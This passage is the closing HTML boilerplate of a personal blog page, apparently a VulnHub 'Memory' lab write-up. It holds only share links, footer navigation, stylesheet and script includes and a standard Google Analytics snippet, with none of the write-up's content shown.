  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&name=Memory&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2026 zhaochoudecat
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<link rel="stylesheet" href="/lib/meslo-LG/styles.css">


<link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">



<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-86660611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Disqus Comments -->


